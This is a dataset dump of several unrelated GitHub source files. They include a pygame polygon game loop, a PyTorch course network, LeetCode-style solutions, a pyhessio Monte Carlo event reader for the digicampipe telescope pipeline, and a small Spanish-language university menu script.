(newc[0],newc[1],newsides,newcol,newangle)\n\t\t\tcontinue\n\t\tex -= 0.5*math.cos(eangle)\n\t\tey += 0.5*math.sin(eangle)\n\t\topposite = -ey - py\n\t\tadjacent = ex - px\n\t\tanglett = math.atan2(opposite,adjacent)\n\t\tanglevel = 0.02\n\t\tif abs(eangle-anglett)>=2*anglevel:\n\t\t\tif eangle > 0 and anglett > 0:\n\t\t\t\tif eangle > anglett:\n\t\t\t\t\teangle -= anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle += anglevel\n\t\t\telif eangle > 0 and anglett < 0:\n\t\t\t\tif anglett > eangle - math.pi:\n\t\t\t\t\teangle -= anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle += anglevel\n\t\t\telif eangle < 0 and anglett < 0:\n\t\t\t\tif eangle < anglett:\n\t\t\t\t\teangle += anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle -= anglevel\n\t\t\telse:\n\t\t\t\tif anglett < eangle + math.pi:\n\t\t\t\t\teangle += anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle -= anglevel\n\t\tenemies[i] = (ex,ey,e[2],e[3],eangle)\n\n\t\t\t\n\n\t\t\n\n\n# Initializing pygame and opening a window:\n\nfullscreen = False\n\npygame.init()\n\npxwidth = 640\npxheight = 360\n\ngameDisp = pygame.display.set_mode((pxwidth,pxheight),pygame.RESIZABLE)\n\n# Setting up the game field:\n\ngamewidth = 640\ngameheight = 360\n\ngamefield = pygame.Surface((gamewidth,gameheight),0)\ngamefield.fill((255,255,255))\n\n# Title stuff\n\npygame.display.set_caption('polyAgonY')\ntitlepic_o = pygame.image.load(os.path.join('img','title.png'))\ntitlepic = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,titlepic_o.get_bitsize(),titlepic_o.get_masks())\npygame.transform.scale(titlepic_o,(gamewidth,gameheight),titlepic)\ndel titlepic_o\nanykey_o = pygame.image.load(os.path.join('img','instructions.png'))\nanykey = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,anykey_o.get_bitsize(),anykey_o.get_masks())\npygame.transform.scale(anykey_o,(gamewidth,gameheight),anykey)\ndel anykey_o\ngameover_o = pygame.image.load(os.path.join('img','gameover.png'))\ngameover = 
pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,gameover_o.get_bitsize(),gameover_o.get_masks())\npygame.transform.scale(gameover_o,(gamewidth,gameheight),gameover)\ndel gameover_o\nmovement_o = pygame.image.load(os.path.join('img','movement.png'))\nmovement = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,movement_o.get_bitsize(),movement_o.get_masks())\npygame.transform.scale(movement_o,(gamewidth,gameheight),movement)\ndel movement_o\n\n# Sound Stuff\n\npygame.mixer.init()\n\nouch = pygame.mixer.Sound(os.path.join('snd','ouch.wav'))\nblip = pygame.mixer.Sound(os.path.join('snd','blip.wav'))\nnop = pygame.mixer.Sound(os.path.join('snd','nop.wav'))\n\n# Inverted stars, to perceive movement:\nstars = []\ndef genstar():\n\treturn (random.randint(-gamewidth//2,gamewidth//2) + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\ndef genstars(num):\n\tslist = []\n\tfor i in range(num):\n\t\tslist.append(genstar())\n\treturn slist\n\ndef renderstar(targetsurface,star):\n\tpygame.gfxdraw.pixel(targetsurface,int(star[0] + gamewidth//2 - px),int(star[1] + gameheight//2 + py),(star[2],star[2],star[2]))\n\ndef renderstars(targetsurface):\n\tfor s in stars:\n\t\trenderstar(targetsurface,s)\n\ndef teststars():\n\tfor i in range(len(stars)):\n\t\ts = stars[i]\n\t\tsx = int(s[0] + gamewidth//2 - px)\n\t\tsy = int(s[1] + gameheight//2 + py)\n\t\tif sx < 0:\n\t\t\tstars[i] = (gamewidth//2 + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sx >= gamewidth:\n\t\t\tstars[i] = (-gamewidth//2 + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sy < 0:\n\t\t\tstars[i] = (random.randint(-gamewidth//2,gamewidth//2) + px,gameheight//2 - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sy >= gameheight:\n\t\t\tstars[i] = (random.randint(-gamewidth//2,gamewidth//2) + px,-gameheight//2 - py,random.randint(0,128))\n\t\t\tcontinue\n\n\n# Setting up the timer for framerate limiting:\nclock = pygame.time.Clock()\n\n# Cycle condition:\nrunning = True\n\n# Game tick counter:\ntick = 0\n\n# Game state:\nstate = 0\n#\tStates:\n#\t0\tIntro\n#\t1\tGame\n#\t2\tPause\n#\t3\tOutro\n\n# Main loop:\nwhile running:\n\t# Event handling:\n\tfor each_event in pygame.event.get():\n\t\tif each_event.type == pygame.KEYDOWN:\n\t\t\tif each_event.key ==pygame.K_ESCAPE:\n\t\t\t\t# If you escape, you escape\n\t\t\t\trunning = False\n\t\t\t\tcontinue\n\t\t\telif each_event.key == pygame.K_F11:\n\t\t\t\t# Toggling fullscreen\n\t\t\t\tif fullscreen:\n\t\t\t\t\tfullscreen = False\n\t\t\t\t\tgameDisp = pygame.display.set_mode((oldw,oldh),pygame.RESIZABLE)\n\t\t\t\telse:\n\t\t\t\t\tfullscreen = True\n\t\t\t\t\toldw = pxwidth\n\t\t\t\t\toldh = pxheight\n\t\t\t\t\tmodes = pygame.display.list_modes()\n\t\t\t\t\tgameDisp = pygame.display.set_mode(modes[0],pygame.FULLSCREEN)\n\t\t\t\tdisps = pygame.display.get_surface()\n\t\t\t\tpxwidth,pxheight = disps.get_size()\n\t\t\t\tcontinue\n\t\t\tif state == 1:\n\t\t\t\t# Game\n\t\t\t\tif not (paccel or pdecel):\n\t\t\t\t\tif each_event.key == pygame.K_w:\n\t\t\t\t\t\tpaccel = True\n\t\t\t\t\telif each_event.key == pygame.K_s:\n\t\t\t\t\t\tpdecel = True\n\t\t\t\tif not (pport or pstarboard):\n\t\t\t\t\tif each_event.key == pygame.K_a:\n\t\t\t\t\t\tpport = True\n\t\t\t\t\telif each_event.key == pygame.K_d:\n\t\t\t\t\t\tpstarboard = True\n\t\t\t#elif state == 2:\n\t\t\t\t# Pause\n\t\t\t#else:\n\t\t\t\t# Outro\n\t\telif each_event.type == pygame.KEYUP:\n\t\t\tif 
each_event.key ==pygame.K_ESCAPE:\n\t\t\t\tcontinue\n\t\t\telif each_event.key == pygame.K_F11:\n\t\t\t\tcontinue\n\t\t\tif state == 0:\n\t\t\t\t# Intro\n\t\t\t\tstate = 1\n\t\t\t\ttick = 0\n\t\t\t\tpangle = default_pangle\n\t\t\t\tpspeed = default_pspeed\n\t\t\t\tpmaxspeed = default_pmaxspeed\n\t\t\t\tpaccelv = default_paccelv\n\t\t\t\tpdecelv = default_pdecelv\n\t\t\t\tpaccel = default_paccel\n\t\t\t\tpdecel = default_pdecel\n\t\t\t\tpport = default_pport\n\t\t\t\tpstarboard = default_pstarboard\n\t\t\t\tpangulaccel = default_pangulaccel\n\t\t\t\tpx = default_px\n\t\t\t\tpy = default_py\n\t\t\t\tpstate = default_pstate\n\t\t\t\tpradius = default_pradius\n\t\t\t\tpcolor = default_pcolor\n\t\t\t\tdel enemies\n\t\t\t\tenemies = genenemies(1000,10000)\n\t\t\t\tdel stars\n\t\t\t\tstars = genstars(256)\n\t\t\telif state == 1:\n\t\t\t\t# Game\n\t\t\t\tif each_event.key == pygame.K_w:\n\t\t\t\t\tpaccel = False\n\t\t\t\telif each_event.key == pygame.K_s:\n\t\t\t\t\tpdecel = False\n\t\t\t\telif each_event.key == pygame.K_a:\n\t\t\t\t\tpport = False\n\t\t\t\telif each_event.key == pygame.K_d:\n\t\t\t\t\tpstarboard = False\n\t\t\t\telif each_event.key == pygame.K_UP:\n\t\t\t\t\tpstate = ((pstate - 2) % 3) + 3\n\t\t\t\telif each_event.key == pygame.K_DOWN:\n\t\t\t\t\tpstate = ((pstate - 4) % 3) + 3\n\t\t\t\telif each_event.key == pygame.K_LEFT:\n\t\t\t\t\tpcolor = (pcolor - 1) % len(saturated)\n\t\t\t\telif each_event.key == pygame.K_RIGHT:\n\t\t\t\t\tpcolor = (pcolor + 1) % len(saturated)\n\t\t\t\telif each_event.key == pygame.K_SPACE:\n\t\t\t\t\tstate = 2\n\t\t\telif state == 2:\n\t\t\t\tif each_event.key == pygame.K_SPACE:\n\t\t\t\t\tstate = 1\n\t\t\t\tif each_event.key == pygame.K_r:\n\t\t\t\t\tstate = 0\n\t\t\telse:\n\t\t\t\t#Outro\n\t\t\t\tif each_event.key == pygame.K_SPACE or each_event.key == pygame.K_RETURN:\n\t\t\t\t\tstate = 0\n\t\telif each_event.type == pygame.QUIT:\n\t\t\t# If you wanna exit the window, we'll let'ya\n\t\t\trunning = False\n\t\telif each_event.type == pygame.VIDEORESIZE:\n\t\t\t# The window is resizeable. 
If it is, in fact, resized, it needs to be handled\n\t\t\tpxwidth = each_event.w\t# New width\n\t\t\tpxheight = each_event.h\t# New height\n\t\t\tif pxwidth < gamewidth:\n\t\t\t\tpxwidth = gamewidth\n\t\t\tif pxheight < gameheight:\n\t\t\t\tpxheight = gameheight\n\t\t\tgameDisp = pygame.display.set_mode((pxwidth,pxheight),pygame.RESIZABLE)\n\t\t\tdisps = pygame.display.get_surface()\n\t\n\t# Clear screen:\n\tif state < 2:\n\t\tgamefield.fill((255,255,255))\n\t\ttick = tick + 1\n\t\n\t# States:\n\tif state == 0:\n\t\t# Intro\n\t\t# Rotation rate - 30 = 1 RPS, 60 = 0.5 RPS, and so on\n\t\trrate = 240\n\t\tpurengon(gamefield,gameheight//2,gameheight//2,3 + ((tick//180)\n\t\t\t% 15),gameheight//3,((tick %\n\t\t\t\trrate)*math.pi*2)/rrate,colors[saturated[(tick//30)%\n\t\t\t\t\tlen(saturated)]],(0,0,0),1)\n\t\tgamefield.blit(titlepic,(0,0),None,0)\n\t\tif (tick // 30) % 2 == 1:\n\t\t\tgamefield.blit(anykey,(0,0),None,0)\n\n\telif state == 1:\n\t\t#Game\n\t\tteststars()\n\n\t\tnenemies = renderenemies(gamefield)\n\n\t\trenderstars(gamefield)\n\n\t\trenderplayer(gamefield)\n\t\tpx = px + pspeed * math.cos(pangle)\n\t\tpy = py - pspeed * math.sin(pangle)\n\t\tif paccel and not pdecel:\n\t\t\tpspeed = pspeed + paccelv\n\t\t\tif pspeed > pmaxspeed:\n\t\t\t\tpspeed = pmaxspeed\n\t\telif pdecel and not paccel:\n\t\t\tpspeed = pspeed - pdecelv\n\t\t\tif pspeed < 0:\n\t\t\t\tpspeed = 0\n\t\tif pport and not pstarboard:\n\t\t\tpangle -= pangulaccel\n\t\telif pstarboard and not pport:\n\t\t\tpangle += pangulaccel\n\t\twhile pangle > math.pi:\n\t\t\tpangle = pangle - 2*math.pi\n\t\twhile pangle < (-1)*math.pi:\n\t\t\tpangle = pangle + 2*math.pi\n\n\t\ttickenemies(10000)\n\n\t\tif pradius < 5 or pradius > gameheight//2:\n\t\t\tstate = 3\n\t\t\tgamefield.blit(gameover,(0,0),None,0)\n\t\t\tpygame.font.init()\n\t\t\tpixel = pygame.font.Font(os.path.join('txt','PIXEL___.TTF'),16)\n\t\t\tseconds = tick//30\n\t\t\tminutes = seconds//60\n\t\t\tseconds = seconds%60\n\t\t\tmessage = \"\"\n\t\t\tif minutes > 0:\n\t\t\t\tmessage = \"%s%d minutes, \"%(message,minutes)\n\t\t\tmessage = \"%s%d seconds\"%(message,seconds)\n\t\t\ttextsurf = pixel.render(message,False,colors['white'],colors['black'])\n\t\t\ttw = textsurf.get_width()\n\t\t\ttos = (gamewidth - tw)//2\n\t\t\tgamefield.blit(textsurf,(tos,32),None,0)\n\t\t\tdel message\n\t\t\tdel textsurf\n\t\t\tdel tw\n\t\t\tdel tos\n\t\t\tdel pixel\n\t\t\tpygame.font.quit()\n\n\t\tif tick < 90:\n\t\t\tgamefield.blit(movement,(0,0),None,0)\n\n\t#elif state == 2:\n\t\t#Pause\n\t#else:\n\t\t#Outro\n\t\n\n\n\t# Framerate limiting\n\tclock.tick(30)\n\t\n\t# Placing the game field on screen\n\tscale = min(int(pxwidth*1.0/(1.0*gamewidth)),int(pxheight*1.0/(1.0*gameheight)))\n\t\n\tscaledwidth = int(round(gamewidth*scale))\n\tscaledheight = int(round(gameheight*scale))\n\t\n\tdestination = pygame.Surface((scaledwidth,scaledheight),0)\n\t\n\tpygame.transform.scale(gamefield, (scaledwidth, scaledheight), destination)\n\t\n\txoffset = round((pxwidth - scaledwidth)*0.5)\n\tyoffset = round((pxheight - scaledheight)*0.5)\n\t\n\tgameDisp.blit(destination,(xoffset,yoffset),None,0)\n\t\n\t# Updating the window:\n\tpygame.display.update()\n\n# We got out of that vicious cycle, gotta get going:\npygame.quit()\nquit()\n","repo_name":"raffitz/LD35","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13942,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13251567356","text":"# 
------------------------------------------------------------------------------\n#\n#   Phys 490--Winter 2021 (P Ronagh)\n#   Lecture 6--A Primer to ML R&D in PyTorch\n#\n# ------------------------------------------------------------------------------\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport numpy as np\n\nclass Net(nn.Module):\n    '''\n    Neural network class.\n    Architecture:\n        Four fully-connected layers fc1 through fc4.\n        ReLU activations on the hidden layers, sigmoid on the output.\n    '''\n\n    def __init__(self, n_bits):\n        super(Net, self).__init__()\n        self.fc1= nn.Linear(n_bits, 100)\n        self.fc2= nn.Linear(100, 100)\n        self.fc3= nn.Linear(100, 100)\n        self.fc4= nn.Linear(100, 5)\n\n    # Feedforward function\n    def forward(self, x):\n        h1 = func.relu(self.fc1(x))\n        h2 = func.relu(self.fc2(h1))\n        h3 = func.relu(self.fc3(h2))\n        y = torch.sigmoid(self.fc4(h3))\n        return y\n\n    # Reset function for the training weights\n    # Use if the same network is trained multiple times.\n    def reset(self):\n        self.fc1.reset_parameters()\n        self.fc2.reset_parameters()\n        self.fc3.reset_parameters()\n        self.fc4.reset_parameters()\n\n    # Backpropagation function\n    def backprop(self, data, loss, epoch, optimizer):\n        self.train()\n        inputs= torch.from_numpy(data.x_train)\n        targets= torch.from_numpy(data.y_train)\n        outputs= self(inputs)\n        # An alternative to what you saw in the jupyter notebook is to\n        # flatten the output tensor. This way both the targets and the model\n        # outputs will become 1-dim tensors.\n        obj_val= loss(outputs, targets)  # reuse the forward pass computed above\n        optimizer.zero_grad()\n        obj_val.backward()\n        optimizer.step()\n        return obj_val.item()\n\n    def accuracy(self, data):\n        accurate_train = 0\n        accurate_test = 0\n        with torch.no_grad():\n            target_train = self.forward(torch.from_numpy(data.x_train))\n            target_test = self.forward(torch.from_numpy(data.x_test))\n\n        for i in range(len(data.y_train)):\n            #print(target_train[i], data.y_train[i])\n            if np.allclose(target_train.numpy()[i], data.y_train[i], atol = 1e-1): accurate_train += 1\n        for i in range(len(data.y_test)):\n            #print(target_train[i], y_train[i])\n            if np.allclose(target_test.numpy()[i], data.y_test[i], atol = 1e-2): accurate_test += 1\n\n        return accurate_train, accurate_test\n\n\n    # Test function. 
Avoids calculation of gradients.\n    def test(self, data, loss, epoch):\n        self.eval()\n        with torch.no_grad():\n            inputs= torch.from_numpy(data.x_test)\n            targets= torch.from_numpy(data.y_test)\n            outputs= self(inputs)\n            cross_val= loss(outputs, targets)  # reuse the forward pass computed above\n        return cross_val.item()\n","repo_name":"shivi47/PHYS-490-Machine-Learning","sub_path":"HW2/src/nn_gen.py","file_name":"nn_gen.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43488359197","text":"class Solution:\n    def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n        # Monotonic stack of indices awaiting a warmer day; each popped index\n        # has its temperature overwritten in place with its waiting time.\n        stack, temp = [], temperatures\n        for i in range(len(temp)):\n            while stack and temp[i] > temp[stack[-1]]:\n                j = stack.pop()\n                temp[j] = i - j\n            stack.append(i)\n        # Indices still on the stack never see a warmer day.\n        for _ in range(len(stack)):\n            temp[stack.pop()] = 0\n        return temp\n","repo_name":"yosef212321/LeetCode_Problems","sub_path":"Daily_Temperatures/Daily Temperatures.py","file_name":"Daily Temperatures.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27704595728","text":"# naive counting strategy: try every start index, O(n^2) substring scans\n\ndef countk(s,k):\n    n = len(s)\n    res=0\n    for i in range(0,n):\n        dist_count=0\n        freq = {c: 0 for c in 'abcdefghijklmnopqrstuvwxyz'}\n\n        for j in range(i,n):\n\n            if freq[s[j]]==0:\n                dist_count+=1\n\n            freq[s[j]]+=1\n\n            if dist_count==k:\n                res+=1\n            if dist_count>k:\n                break\n\n    return res\n\nprint(countk('pqpqs',2))\n","repo_name":"BJV-git/Data_structures_and_Algorithms","sub_path":"Data_structures_and_Algorithms/strings/count_k_distinct_sub.py","file_name":"count_k_distinct_sub.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12915866205","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nComponents to read HESSIO data.\n\nThis requires the hessio python library to be installed\n\"\"\"\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom astropy import units as u\nfrom astropy.coordinates import Angle\nfrom astropy.time import Time\nfrom ctapipe.core import Provenance\nfrom ctapipe.instrument import TelescopeDescription, SubarrayDescription\n\nfrom digicampipe.instrument.camera import DigiCam\nfrom digicampipe.io.containers import DataContainer\n\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    from pyhessio import open_hessio\n    from pyhessio import HessioError\n    from pyhessio import HessioTelescopeIndexError\n    from pyhessio import HessioGeneralError\nexcept ImportError as err:\n    logger.fatal(\n        \"the `pyhessio` python module is \"\n        \"required to access MC data: {}\".format(err))\n    raise err\n\n__all__ = [\n    'hessio_event_source',\n]\n\n\ndef hessio_get_list_event_ids(url, max_events=None):\n    \"\"\"\n    Faster method to get a list of all the event ids in the hessio file.\n    This list can also be used to find out the number of events that exist\n    in the file.\n\n    Parameters\n    ----------\n    url : str\n        path to file to open\n    max_events : int, optional\n        maximum number of events to read\n\n    Returns\n    -------\n    event_id_list : list[num_events]\n        A list with all the event ids that are in the file.\n\n    \"\"\"\n    logger.warning(\"This method is slow. 
Need to find faster method.\")\n    try:\n        with open_hessio(url) as pyhessio_file:\n            Provenance().add_input_file(url, role='r0.sub.evt')\n            counter = 0\n            event_id_list = []\n            eventstream = pyhessio_file.move_to_next_event()\n            for event_id in eventstream:\n                event_id_list.append(event_id)\n                counter += 1\n                if max_events and counter >= max_events:\n                    pyhessio_file.close_file()\n                    break\n            return event_id_list\n    except HessioError:\n        raise RuntimeError(\"hessio_event_source failed to open '{}'\"\n                           .format(url))\n\n\ndef hessio_event_source(url, camera=DigiCam, max_events=None,\n                        allowed_tels=None, requested_event=None,\n                        use_event_id=False, event_id=None, disable_bar=False):\n    \"\"\"A generator that streams data from an EventIO/HESSIO MC data file\n    (e.g. a standard CTA data file.)\n\n    Parameters\n    ----------\n    url : str\n        path to file to open\n    max_events : int, optional\n        maximum number of events to read\n    allowed_tels : list[int]\n        select only a subset of telescopes; if None, all are read. This can\n        be used, for example, to emulate the final CTA data format, where\n        there would be 1 telescope per file (whereas in current monte-carlo,\n        they are all interleaved into one file)\n    requested_event : int\n        Seek to a particular event index\n    use_event_id : bool\n        If True, 'requested_event' seeks a particular event id instead of\n        an index\n    disable_bar : bool\n        If True, disable the tqdm progress bar\n    \"\"\"\n\n    if event_id is not None:\n\n        raise ValueError('Event id feature not implemented yet! \\n'\n                         'Use event_id=None')\n\n    with open_hessio(url) as pyhessio_file:\n\n        # the container is initialized once, and data is replaced within\n        # it after each yield\n        Provenance().add_input_file(url, role='dl0.sub.evt')\n        counter = 0\n\n        eventstream = pyhessio_file.move_to_next_event()\n        if allowed_tels is not None:\n            allowed_tels = set(allowed_tels)\n        data = DataContainer()\n        data.meta['origin'] = \"hessio\"\n\n        # some hessio_event_source specific parameters\n        data.meta['input'] = url\n        data.meta['max_events'] = max_events\n\n        for event_id in tqdm(eventstream, disable=disable_bar):\n\n            # Seek to requested event\n            if requested_event is not None:\n                current = counter\n                if use_event_id:\n                    current = event_id\n                if not current == requested_event:\n                    counter += 1\n                    continue\n\n            data.r0.run_id = pyhessio_file.get_run_number()\n            data.r0.event_id = event_id\n            data.r0.tels_with_data = list(pyhessio_file.get_teldata_list())\n\n            data.r1.run_id = pyhessio_file.get_run_number()\n            data.r1.event_id = event_id\n            data.r1.tels_with_data = list(pyhessio_file.get_teldata_list())\n            data.dl0.run_id = pyhessio_file.get_run_number()\n            data.dl0.event_id = event_id\n            data.dl0.tels_with_data = list(pyhessio_file.get_teldata_list())\n\n            # handle telescope filtering by taking the intersection of\n            # tels_with_data and allowed_tels\n            if allowed_tels is not None:\n                # tels_with_data is a list, so convert before intersecting\n                selected = set(data.r0.tels_with_data) & allowed_tels\n                if len(selected) == 0:\n                    continue  # skip event\n                data.r0.tels_with_data = selected\n                data.r1.tels_with_data = selected\n                data.dl0.tels_with_data = selected\n\n            data.trig.tels_with_trigger \\\n                = pyhessio_file.get_central_event_teltrg_list()\n            time_s, time_ns = pyhessio_file.get_central_event_gps_time()\n            data.trig.gps_time = Time(time_s * u.s, time_ns * u.ns,\n                                      format='unix', scale='utc')\n            data.mc.energy = pyhessio_file.get_mc_shower_energy() * u.TeV\n            data.mc.alt = Angle(pyhessio_file.get_mc_shower_altitude(), u.rad)\n            data.mc.az = Angle(pyhessio_file.get_mc_shower_azimuth(), u.rad)\n            data.mc.core_x = pyhessio_file.get_mc_event_xcore() 
* u.m\n data.mc.core_y = pyhessio_file.get_mc_event_ycore() * u.m\n first_int = pyhessio_file.get_mc_shower_h_first_int() * u.m\n data.mc.h_first_int = first_int\n\n # mc run header data\n data.mcheader.run_array_direction = \\\n pyhessio_file.get_mc_run_array_direction()\n\n data.count = counter\n\n # this should be done in a nicer way to not re-allocate the\n # data each time (right now it's just deleted and garbage\n # collected)\n\n data.r0.tel.clear()\n data.r1.tel.clear()\n data.dl0.tel.clear()\n data.dl1.tel.clear()\n data.mc.tel.clear() # clear the previous telescopes\n\n _fill_instrument_info(data, pyhessio_file, camera.geometry, camera)\n\n for tel_id in data.r0.tels_with_data:\n\n data.mc.mc_event_offset_fov = \\\n pyhessio_file.get_mc_event_offset_fov()\n\n data.mc.tel[tel_id].dc_to_pe \\\n = pyhessio_file.get_calibration(tel_id)\n data.mc.tel[tel_id].pedestal \\\n = pyhessio_file.get_pedestal(tel_id)\n\n data.r0.tel[tel_id].camera_event_number = event_id\n\n data.r0.tel[tel_id].adc_samples = \\\n pyhessio_file.get_adc_sample(tel_id)\n\n data.r0.tel[tel_id].adc_samples = \\\n data.r0.tel[tel_id].adc_samples[0]\n data.r0.tel[tel_id].local_camera_clock = 0\n\n if data.r0.tel[tel_id].adc_samples.size == 0:\n # To handle ASTRI and dst files\n data.r0.tel[tel_id].adc_samples = \\\n pyhessio_file.get_adc_sum(tel_id)[..., None]\n data.r0.tel[tel_id].adc_sums = \\\n pyhessio_file.get_adc_sum(tel_id)\n\n try:\n\n data.mc.tel[tel_id].reference_pulse_shape = \\\n pyhessio_file.get_ref_shapes(tel_id)\n\n except HessioGeneralError:\n\n pass\n\n nsamples = pyhessio_file.get_event_num_samples(tel_id)\n if nsamples <= 0:\n nsamples = 1\n data.r0.tel[tel_id].num_samples = nsamples\n\n # load the data per telescope/pixel\n hessio_mc_npe = pyhessio_file.get_mc_number_photon_electron\n data.mc.tel[tel_id].photo_electron_image \\\n = hessio_mc_npe(telescope_id=tel_id)\n data.mc.tel[tel_id].meta['refstep'] = \\\n pyhessio_file.get_ref_step(tel_id)\n data.mc.tel[tel_id].time_slice = \\\n pyhessio_file.get_time_slice(tel_id)\n data.mc.tel[tel_id].azimuth_raw = \\\n pyhessio_file.get_azimuth_raw(tel_id)\n data.mc.tel[tel_id].altitude_raw = \\\n pyhessio_file.get_altitude_raw(tel_id)\n data.mc.tel[tel_id].azimuth_cor = \\\n pyhessio_file.get_azimuth_cor(tel_id)\n data.mc.tel[tel_id].altitude_cor = \\\n pyhessio_file.get_altitude_cor(tel_id)\n pedestal = data.mc.tel[tel_id].pedestal\n baseline = pedestal / data.r0.tel[tel_id].adc_samples.shape[1]\n data.r0.tel[tel_id].digicam_baseline = np.squeeze(baseline)\n\n yield data\n counter += 1\n\n if max_events and counter >= max_events:\n pyhessio_file.close_file()\n return\n\n\ndef _fill_instrument_info(data, pyhessio_file, camera_geometry, camera):\n \"\"\"\n fill the data.inst structure with instrumental information.\n\n Parameters\n ----------\n data: DataContainer\n data container to fill in\n\n \"\"\"\n if not data.inst.telescope_ids:\n data.inst.telescope_ids = list(pyhessio_file.get_telescope_ids())\n data.inst.subarray = SubarrayDescription(\"MonteCarloArray\")\n\n for tel_id in data.inst.telescope_ids:\n try:\n\n pix_pos = pyhessio_file.get_pixel_position(tel_id) * u.m\n foclen = pyhessio_file.get_optical_foclen(tel_id) * u.m\n mirror_area = pyhessio_file.get_mirror_area(tel_id) * u.m ** 2\n num_tiles = pyhessio_file.get_mirror_number(tel_id)\n tel_pos = pyhessio_file.get_telescope_position(tel_id) * u.m\n\n tel = TelescopeDescription.guess(*pix_pos, foclen)\n tel.optics.mirror_area = mirror_area\n tel.optics.num_mirror_tiles = num_tiles\n 
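# Register the guessed telescope description and its position in the\n                # subarray container (one entry per telescope id).\n                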
data.inst.subarray.tels[tel_id] = tel\n                data.inst.subarray.positions[tel_id] = tel_pos\n\n                # deprecated fields that will become part of\n                # TelescopeDescription or SubarrayDescription\n                data.inst.optical_foclen[tel_id] = foclen\n                data.inst.pixel_pos[tel_id] = pix_pos\n                data.inst.tel_pos[tel_id] = tel_pos\n\n                nchans = pyhessio_file.get_num_channel(tel_id)\n                npix = pyhessio_file.get_num_pixels(tel_id)\n                data.inst.num_channels[tel_id] = nchans\n                data.inst.num_pixels[tel_id] = npix\n                data.inst.mirror_dish_area[tel_id] = mirror_area\n                data.inst.mirror_numtiles[tel_id] = num_tiles\n\n                geometry = camera_geometry\n                patch_matrix = camera.patch_matrix\n                cluster_7_matrix = camera.cluster_7_matrix\n                cluster_19_matrix = camera.cluster_19_matrix\n\n                data.inst.geom[tel_id] = geometry\n                data.inst.cluster_matrix_7[tel_id] = cluster_7_matrix\n                data.inst.cluster_matrix_19[tel_id] = cluster_19_matrix\n                data.inst.patch_matrix[tel_id] = patch_matrix\n\n        except HessioGeneralError:\n            pass\n","repo_name":"cta-sst-1m/digicampipe","sub_path":"digicampipe/io/hessio.py","file_name":"hessio.py","file_ext":"py","file_size_in_byte":11780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"19890003158","text":"from claseCarrera import Carrera\nfrom claseFacultad import Facultad\nfrom ManejadorFacultades import ManejadorFacultad\nfrom Menu import Menu\n\n\ndef test():\n    Manejador = ManejadorFacultad()\n    Manejador.CargarLista()\n    Manejador.mostrarLista()\n    Mod_Menu = Menu()\n    Salir = True\n    while Salir:\n        print(\"Welcome to the menu\")\n        print(\"1. Option 1: Enter a faculty code and show the faculty name plus the name and duration of each degree program taught at that faculty\")\n        print(\"2. Option 2: Given the name of a degree program, show its code (built from the faculty code number and the program code) and the name and city of the faculty where it is taught\")\n        print(\"0. 
Salir\")\n opcion = input(\"Ingrese la opcion: \")\n if opcion =='1':\n codigo = float(input(\"Ingrese el codigo de una facultad: \"))\n Mod_Menu.opcion1(codigo)\n elif opcion =='2':\n nombre_carrera = str(input(\"Ingrese el nombre de la carrera: \"))\n Mod_Menu.opcion2(nombre_carrera)\n else:\n if (opcion == '0'):\n Salir = False\n Mod_Menu.salir()\n else:\n print (\"Opcion invalida\")\n Salir=False\n\n\nif __name__ == '__main__':\n test()\n\n ","repo_name":"CristianAlv/Unidad-3-2023","sub_path":"Ejercicio 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73001633369","text":"# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n# 给定一个节点数为n的无序单链表,对其按升序排序。\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n#\n# @param head ListNode类 the head node\n# @return ListNode类\n#\nclass Solution:\n def sortInList(self , head: ListNode) -> ListNode:\n # write code here\n tmp = []\n tmp.append(head.val)\n while head.next:\n head = head.next\n tmp.append(head.val)\n tmp.sort()\n result = ListNode(-1)\n temp = result\n for i in tmp:\n tt = ListNode(i)\n temp.next = tt\n temp = temp.next\n return result.next","repo_name":"lucifer726/leetcode_","sub_path":"链表/单链表的排序.py","file_name":"单链表的排序.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72637187289","text":"#!/usr/bin/python3\n# function to print and return last digit of a number\n\n\ndef print_last_digit(number):\n if number < 0:\n d = number % -10\n d = -d\n else:\n d = number % 10\n print(\"{:d}\".format(d), end=\"\")\n return (d)\n","repo_name":"blueExcess/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/9-print_last_digit.py","file_name":"9-print_last_digit.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 